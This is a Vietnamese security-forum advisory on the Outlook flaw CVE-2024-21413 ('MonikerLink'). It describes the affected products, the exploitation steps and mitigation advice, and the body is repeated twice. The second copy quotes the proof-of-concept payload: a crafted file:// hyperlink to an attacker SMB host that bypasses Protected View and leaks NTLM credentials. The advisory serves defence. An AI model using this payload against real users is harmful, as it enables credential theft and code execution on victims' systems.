-
09/04/2020
-
85
-
553 bài viết
Cảnh báo: Lỗ hổng trong Microsoft Outlook cho phép đánh cắp thông tin đăng nhập
Một lỗ hổng nghiêm trọng CVE-2024-21413 (điểm CVSS là 9,8/10) tồn tại trong Microsoft Outlook vừa được công bố cho phép thực thi mã từ xa (RCE) khi người dùng mở email có kèm liên kết độc hại. Đặc biệt, PoC của lỗ hổng đã được phát hành khiến rủi ro đối với người dùng sẽ cao hơn.
Các sản phẩm Office bị ảnh hưởng bao gồm: Microsoft Office LTSC 2021 và Microsoft 365 Apps dành cho doanh nghiệp, Microsoft Outlook 2016 và Microsoft Office 2019 (hỗ trợ mở rộng).
Lỗ hổng có tên #MonikerLink, lợi dụng cách Outlook xử lý các hyperlink, cho phép kẻ tấn công qua mặt chế độ xem được bảo vệ (Protected View). Trong PoC mới được công khai trên GitHub, các bước khai thác cụ thể như sau:
Bước 1: Kẻ tấn công gửi email có hyperlink “file://” được tạo đặc biệt để qua mặt tính năng Protected View:
Bước 2: Người dùng sẽ bị kết nối đến máy chủ của kẻ tấn công qua giao thức SMB và gửi đi các xác thực NTLM có chứa thông tin đăng nhập nhạy cảm.
Bước 3: Kẻ tấn công lợi dụng Component Object Model (COM) của Windows để chạy mã độc, giúp chúng có thêm quyền kiểm soát hệ thống của nạn nhân.
Theo đánh giá của các chuyên gia WhiteHat, CVE-2024-21413 ảnh hưởng đến nhiều người dùng và rất nguy hiểm vì nó có thể bị khai thác với sự tương tác tối thiểu của người dùng - chỉ cần xem trước email trong phần xem trước (preview pane) là đủ để kích hoạt lỗi. Tuy nhiên, để có được các thông tin nhạy cảm của người dùng (NTLM), hacker phải crack được hàm băm chứa thông tin đăng nhập khiến khả năng khai thác sẽ khó hơn.
Để giảm thiểu nguy cơ bị tấn công, WhiteHat khuyến cáo người dùng Outlook nên cẩn trọng trước các email lạ, thiết lập mật khẩu mạnh cho tài khoản Outlook và nhanh chóng cập nhật bản vá cho CVE-2024-21413.
Các sản phẩm Office bị ảnh hưởng bao gồm: Microsoft Office LTSC 2021 và Microsoft 365 Apps dành cho doanh nghiệp, Microsoft Outlook 2016 và Microsoft Office 2019 (hỗ trợ mở rộng).
Lỗ hổng có tên #MonikerLink, lợi dụng cách Outlook xử lý các hyperlink, cho phép kẻ tấn công qua mặt chế độ xem được bảo vệ (Protected View). Trong PoC mới được công khai trên GitHub, các bước khai thác cụ thể như sau:
Bước 1: Kẻ tấn công gửi email có hyperlink “file://” được tạo đặc biệt để qua mặt tính năng Protected View:
Mã:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*Bước 2: Người dùng sẽ bị kết nối đến máy chủ của kẻ tấn công qua giao thức SMB và gửi đi các xác thực NTLM có chứa thông tin đăng nhập nhạy cảm.
Bước 3: Kẻ tấn công lợi dụng Component Object Model (COM) của Windows để chạy mã độc, giúp chúng có thêm quyền kiểm soát hệ thống của nạn nhân.
Theo đánh giá của các chuyên gia WhiteHat, CVE-2024-21413 ảnh hưởng đến nhiều người dùng và rất nguy hiểm vì nó có thể bị khai thác với sự tương tác tối thiểu của người dùng - chỉ cần xem trước email trong phần xem trước (preview pane) là đủ để kích hoạt lỗi. Tuy nhiên, để có được các thông tin nhạy cảm của người dùng (NTLM), hacker phải crack được hàm băm chứa thông tin đăng nhập khiến khả năng khai thác sẽ khó hơn.
Để giảm thiểu nguy cơ bị tấn công, WhiteHat khuyến cáo người dùng Outlook nên cẩn trọng trước các email lạ, thiết lập mật khẩu mạnh cho tài khoản Outlook và nhanh chóng cập nhật bản vá cho CVE-2024-21413.
Nguồn: Security Online